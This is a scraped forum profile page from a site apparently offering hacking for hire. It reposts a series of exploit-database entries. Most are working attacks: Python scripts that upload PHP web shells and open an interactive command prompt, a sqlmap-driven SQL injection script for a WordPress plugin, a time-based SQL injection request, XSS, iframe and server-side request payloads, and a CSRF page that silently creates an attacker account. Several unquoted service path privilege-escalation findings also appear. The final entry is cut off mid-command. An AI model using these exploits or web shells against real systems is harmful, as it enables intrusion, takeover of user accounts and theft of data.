Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Attendance and Payroll System v1.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Attendance and Payroll System v1.0 - Remote Code Execution (RCE) # Date: 04/03/2022 # Exploit Author: pr0z # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip # Version: v1.0 # Tested on: Linux, MySQL, Apache import requests import sys from requests.exceptions import ConnectionError # Interface class to display terminal messages class Interface(): def __init__(self): self.red = '\033[91m' self.green = '\033[92m' self.white = '\033[37m' self.yellow = '\033[93m' self.bold = '\033[1m' self.end = '\033[0m' def header(self): print('\n >> Attendance and Payroll System v1.0') print(' >> Unauthenticated Remote Code Execution') print(' >> By pr0z\n') def info(self, message): print(f"[{self.white}*{self.end}] {message}") def warning(self, message): print(f"[{self.yellow}!{self.end}] {message}") def error(self, message): print(f"[{self.red}x{self.end}] {message}") def success(self, message): print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}") upload_path = '/apsystem/admin/employee_edit_photo.php' shell_path = '/apsystem/images/shell.php' #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} shell_data = "<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd);}?>" multipart_form_data = { 'id': 1, 'upload': (''), } files = {'photo': ('shell.php', shell_data)} output = Interface() output.header() # Check for arguments if len(sys.argv) < 2 or '-h' in sys.argv: output.info("Usage: python3 rce.py http://127.0.0.1") sys.exit() # Upload the shell target = sys.argv[1] output.info(f"Uploading the web shell to {target}") r = requests.post(target + upload_path, files=files, data=multipart_form_data, verify=False) # Validating shell has been uploaded output.info(f"Validating the shell has been uploaded to {target}") r = requests.get(target + shell_path, verify=False) try: r = requests.get(target + shell_path) if r.status_code == 200: output.success('Successfully connected to web shell\n') else: raise Exception except ConnectionError: output.error('We were unable to establish a connection') sys.exit() except: output.error('Something unexpected happened') sys.exit() # Remote code execution while True: try: cmd = input("\033[91mRCE\033[0m > ") if cmd == 'exit': raise KeyboardInterrupt r = requests.get(target + shell_path + "?cmd=" + cmd, verify=False) if r.status_code == 200: print(r.text) else: raise Exception except KeyboardInterrupt: sys.exit() except ConnectionError: output.error('We lost our connection to the web shell') sys.exit() except: output.error('Something unexpected happened') sys.exit()
  2. HireHackking

    Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2022-02-17 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download.wondershare.com/ubackit_full8767.exe # Tested Version: 2.0.5 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "wsbackup" | findstr /i /v """ Wondershare wsbackup Service wsbackup C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe Auto # Service info: C:\>sc qc wsbackup [SC] QueryServiceConfig SUCCESS SERVICE_NAME: wsbackup TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare wsbackup Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  3. HireHackking

    Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS) # Google Dork: inurl:/fmlurlsvc/ # Date: 01-Feb-2022 # Exploit Author: Braiant Giraldo Villa # Contact: @iron_fortress (Twitter) # Vendor Homepage: https://www.fortinet.com/products/email-security # Software Link: https://fortimail.fortidemo.com/m/webmail/ (Vendor Demo Online) # Version: # FortiMail version 7.0.1 and below # FortiMail version 6.4.5 and below # FortiMail version 6.2.7 and below # CVE: CVE-2021-43062 (https://www.fortiguard.com/psirt/FG-IR-21-185) 1. Description: An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service. 2. Payload: https%3A%2F%google.com%3CSvg%2Fonload%3Dalert(1)%3E 3. Proof of Concept: https://mydomain.com/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(1)%3E 4. References https://www.fortiguard.com/psirt/FG-IR-21-185 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43062
  4. HireHackking

    Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2022-02-17 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download-es.wondershare.com/famisafe_full7869.exe # Tested Version: 1.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FSService" | findstr /i /v """ FSService FSService C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe Auto # Service info: C:\>sc qc FSService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: FSService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : FSService DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  5. HireHackking

    Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path #Exploit Date: 2022-02-17 #Vendor : IVT Corp #Version : BlueSoleilCS 5.4.277 #Vendor Homepage : www.ivtcorporation.com #Tested on OS: Windows 7 Pro #This software installs EDTService.exe version 11.10.2.1 #Analyze PoC : ============== C:\>sc qc BlueSoleilCS [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: BlueSoleilCS TIPO : 120 WIN32_SHARE_PROCESS (interactive) TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\IVT Corporation\BlueSoleil\BlueSoleilCS.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : BlueSoleilCS DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem
  6. HireHackking

    TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2022-02-17 #Vendor : TOSHIBA #Version : TOSHIBA Navi Support Service 1.00.0000 #Tested on OS: Windows 7 Pro #Analyze PoC : ============== C:\Users\Administrador>sc qc TNaviSrv [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: TNaviSrv TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : TOSHIBA Navi Support Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  7. HireHackking

    Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2022-02-17 #Vendor : Connectify Inc #Version : Connectify Hotspot 2018 #Vendor Homepage : https://www.connectify.me/ #Tested on OS: Windows 7 Pro #Analyze PoC : ============== C:\>sc qc Connectify [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Connectify TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Connectify\ConnectifyService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Connectify Hotspot 2018 DEPENDENCIAS : wlansvc : winmgmt : http NOMBRE_INICIO_SERVICIO: LocalSystem
  8. HireHackking

    Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2022-02-17 #Vendor : Intel #Version : Intel(R) Management Engine Components 6.0.0.1189 #Vendor Homepage : https://www.intel.com #Tested on OS: Windows 7 Pro #Analyze PoC : ============== C:\>sc qc LMS [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: LMS TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Intel(R) Management and Security Application Local Management Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  9. HireHackking

    File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2022-02-14 #Vendor : Hewlett-Packard(HP) #Version : File Sanitizer for HP ProtectTools 5.0.1.3 #Vendor Homepage : http://www.hp.com #Tested on OS: Windows 7 Pro #Analyze PoC : ============== C:\>sc qc HPFSService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: HPFSService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\HPFSService.exe GRUPO_ORDEN_CARGA : File System ETIQUETA : 0 NOMBRE_MOSTRAR : File Sanitizer for HP ProtectTools DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  10. HireHackking

    HMA VPN 5.3 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: HMA VPN 5.3 - Unquoted Service Path # Date: 18/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.hidemyass.com/ # Software Link: https://www.hidemyass.com/en-us/downloads # Version: 5.3.5913.0 # Tested: Windows 10 Pro x64 es C:\Users\saudh>sc qc HmaProVpn [SC] QueryServiceConfig SUCCESS SERVICE_NAME: HmaProVpn TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\Privax\HMA VPN\VpnSvc.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HMA VPN DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  11. HireHackking

    WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated) # Date 18.02.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.getperfectsurvey.com/ # Software Link: https://web.archive.org/web/20210817031040/https://downloads.wordpress.org/plugin/perfect-survey.1.5.1.zip # Version: < 1.5.2 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24762 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md ''' Description: The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection. ''' banner = ''' ___ _ _ ______ ____ ____ ____ ___ ____ _ _ _______ _____ ____ _(___)_ (_) (_)(______) _(____) (____) _(____) (___) _(____)(_) (_)(_______)(_____) _(____) (_) (_)(_) (_)(_)__ ______(_) _(_)(_) (_)(_) _(_)(_)(_) ______(_) _(_)(_)__(_)_ _(_)(_)___ (_) _(_) (_) _ (_) (_)(____)(______) _(_) (_) (_) _(_) (_)(______) _(_) (________)_(_) (_____)_ _(_) (_)___(_) (_)_(_) (_)____ (_)___ (_)__(_) (_)___ (_) (_)___ (_) (_) (_)___(_)(_)___ (___) (___) (______) (______) (____) (______) (_) (______) (_)(_) (_____)(______) [+] Perfect Survey - SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse from datetime import datetime import os # User-Input: my_parser = argparse.ArgumentParser(description= 'Perfect Survey - SQL-Injection (unauthenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('[*] Payload for SQL-Injection:') exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=get_question&question_id=1 *" ' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
  12. HireHackking

    Cab Management System 1.0 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cab Management System 1.0 - Remote Code Execution (RCE) (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html # Version : 1.0 # Tested on: windows 10 xammp | Kali linux # Category: WebApp # Google Dork: N/A # Date: 18.02.2022 ######## Description ######## # # # Step 1: Login admin account and go settings of site # Step 2: Update web site icon and selecet a webshell.php # Step3 : Upload your webshell that's it... # ######## Proof of Concept ######## ========>>> START REQUEST <<<========= POST /cms/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost Content-Length: 11338 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98" Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc5vp1oayEolowCbb X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/?page=system_info Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=samlsgsrh4iq50eqc1qldpthml Connection: close <-- SNIPP HERE --> ------WebKitFormBoundaryc5vp1oayEolowCbb Content-Disposition: form-data; name="img"; filename="shell.php" Content-Type: application/octet-stream <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> ------WebKitFormBoundaryc5vp1oayEolowCbb Content-Disposition: form-data; name="cover"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryc5vp1oayEolowCbb-- <-- SNIPP HERE --> ========>>> END REQUEST <<<========= ========>>> EXPLOIT CODE <<<========= import requests print(""" -------------------------------------------- | | | Author: Alperen Ergel (@alpernae) | | | | CAB Management System v1 Exploit | | | -------------------------------------------- """) username = input("Username: ") password = input("Password: ") URL = input("Domain: ") burp0_url = "http://" + URL + "/cms/classes/Login.php?f=login" burp0_headers = {"sec-ch-ua": "\"(Not(A:Brand\";v=\"8\", \"Chromium\";v=\"98\"", "Accept": "*/*", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36", "sec-ch-ua-platform": "\"Windows\"", "Origin": "http://192.168.1.33", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://192.168.1.33/cms/admin/login.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"} burp0_data = {"username": username, "password": password} requests.post(burp0_url, headers=burp0_headers, data=burp0_data) FILE = input("File: ") burp0_url = "http://" + URL + "/cms/classes/SystemSettings.php?f=update_settings" burp0_headers = {"sec-ch-ua": "\"(Not(A:Brand\";v=\"8\", \"Chromium\";v=\"98\"", "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryc5vp1oayEolowCbb", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36", "sec-ch-ua-platform": "\"Windows\"", "Origin": "http://localhost", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://localhost/cms/admin/?page=system_info", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"} burp0_data = "------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nCab Management System\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nCMS - PHP\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"content[welcome]\"\r\n\r\n<ptest</p>\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"content[about]\"\r\n\r\n<ptest</p>\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + FILE + "\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"cover\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb--\r\n" requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
  13. HireHackking

    Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated) # Google Dork: NA # Date: 02/17/2022 # Exploit Author: Chetanya Sharma @AggressiveUser # Vendor Homepage: https://microweber.org/ # Software Link: https://github.com/microweber/microweber # Version: 1.2.11 # Tested on: [KALI OS] # CVE : CVE-2022-0557 # Reference : https://huntr.dev/bounties/660c89af-2de5-41bc-aada-9e4e78142db8/ # Step To Reproduce - Login using Admin Creds. - Navigate to User Section then Add/Modify Users - Change/Add image of profile and Select a Crafted Image file - Crafted image file Aka A image file which craft with PHP CODES for execution - File Extension of Crafted File is PHP7 like "Sample.php7" - Path of Uploaded Crafted SHELL https://localhost/userfiles/media/default/shell.php7
  14. HireHackking

    Cab Management System 1.0 - 'id' SQLi (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cab Management System 1.0 - 'id' SQLi (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html # Version : 1.0 # Tested on: windows 10 xammp | Kali linux # Category: WebApp # Google Dork: N/A # Date: 18.02.2022 ######## Description ######## # # # Authenticate and get update client settings will be appear the # id paramater put your payload at there it'll be work # # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= GET /cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1 Host: localhost sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=m1s7h9jremg0vj7ipk9m05n1nt Connection: close
  15. HireHackking

    Thinfinity VirtualUI 2.5.26.2 - Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Thinfinity VirtualUI 2.5.26.2 - Information Disclosure Date: 18/01/2022 Exploit Author: Daniel Morales Vendor: https://www.cybelesoft.com <https://www.cybelesoft.com/> Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ <https://www.cybelesoft.com/thinfinity/virtualui/> Version vulnerable: Thinfinity VirtualUI < v2.5.26.2 Tested on: Microsoft Windows CVE: CVE-2021-46354 How it works External service interaction arises when it is possible to induce an application to interact with an arbitrary external service. The ability to send requests to other systems can allow the vulnerable server to filtrate the real IP of the webserver or increase the attack surface (it may be used also to filtrate the real IP behind a CDN). Payload An example of the HTTP request "https://example.com/cmd <https://example.com/cmd>? cmd=connect&wscompression=true&destAddr=domain.com <http://domain.com/> &scraper=fmx&screenWidth=1918&screenHeight=934&fitmode=0&argumentsp=&orientation=0&browserWidth=191 8&browserHeight=872&supportCur=true&id=null&devicePixelRatio=1&isMobile=false&isLandscape=true&supp ortsFullScreen=true&webapp=false” Where "domain.com <http://domain.com/>" is the external endpoint to be requested. Vulnerable versions It has been tested in VirtualUI version 2.1.28.0, 2.1.32.1 and 2.5.26.2 References https://github.com/cybelesoft/virtualui/issues/3 <https://github.com/cybelesoft/virtualui/issues/3> https://www.tenable.com/cve/CVE-2021-46354 <https://www.tenable.com/cve/CVE-2021-46354> https://twitter.com/danielmofer <https://twitter.com/danielmofer>
  16. HireHackking

    Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection Date: 16/12/2021 Exploit Author: Daniel Morales Vendor: https://www.cybelesoft.com <https://www.cybelesoft.com/> Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ <https://www.cybelesoft.com/thinfinity/virtualui/> Version: Thinfinity VirtualUI < v3.0 Tested on: Microsoft Windows CVE: CVE-2021-45092 How it works By accessing the following payload (URL) an attacker could iframe any external website (of course, only external endpoints that allows being iframed). Payload The vulnerable vector is "https://example.com/lab.html?vpath=//wikipedia.com <https://example.com/lab.html?vpath=//wikipedia.com> " where "vpath=//" is the pointer to the external site to be iframed. Vulnerable versions It has been tested in VirtualUI version 2.1.37.2, 2.1.42.2, 2.5.0.0, 2.5.36.1, 2.5.36.2 and 2.5.41.0. References https://github.com/cybelesoft/virtualui/issues/2 <https://github.com/cybelesoft/virtualui/issues/2> https://www.tenable.com/cve/CVE-2021-45092 <https://www.tenable.com/cve/CVE-2021-45092> https://twitter.com/danielmofer <https://twitter.com/danielmofer>
  17. HireHackking

    FileCloud 21.2 - Cross-Site Request Forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF) # Date: 2022-02-20 # Exploit Author: Masashi Fujiwara # Vendor Homepage: https://www.filecloud.com/ # Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2 # Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447) # Tested on: # OS: Ubuntu 18.04.6 LTS (Docker) # Apache: 2.4.52 # FileCloud: 21.2.4.17315 # CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation) # Conditions 1. Only vulnerable if cookies have samesite set to None (SameSite=None). echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php 2. Use https as target url (When cookies set SameSite=None, also set Secure). # PoC (HTML) <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <script> function init(){ myFormData = new FormData(); let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'}); myFormData.append("uploadFormElement", fileContent, "user.csv"); fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", { method: "post", body: myFormData, credentials: "include"}); } </script> </head> <body onload="init()"> CSRF PoC for CVE-2022-25241 Creat hacker user with Password1 via CSV file upload. </body> </html> # HTTPS Request POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1 Host: 192.168.159.129:8443 Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493 Content-Length: 365 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW Connection: close ------WebKitFormBoundaryiAXsUsJ2ZV54DFuW Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv" Content-Type: application/vnd.ms-excel UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES ------WebKitFormBoundaryiAXsUsJ2ZV54DFuW-- # CSV file format UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES
  18. HireHackking

    Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation # Date: 09 Feb 2022 # Exploit Author: @ibby # Vendor Homepage: https://www.vertiv.com/en-us/ # Software Link: https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip # Version: Legacy Versions V_1.0.0 to V_3.3.0-16 # Tested on: Cyclades Serial Console Server software (V_1.0.0 to V_3.3.0-16) # CVE : N/A # The reason this exists, is the admin user & user group is the default user for these devices. The software ships with overly permissive sudo privileges ## for any user in the admin group, or the default admin user. This vulnerability exists in all legacy versions of the software - the last version being from ~2014. ### This vulnerability does not exist in the newer distributions of the ACS Software. #!/bin/bash ## NOTE: To view the vulnerability yourself, uncomment the below code & run as sudo, since it's mounting a file system. ## The software is publicly available, this will grab it and unpack the firmware for you. #TMPDIR=$(mktemp -d) #curl 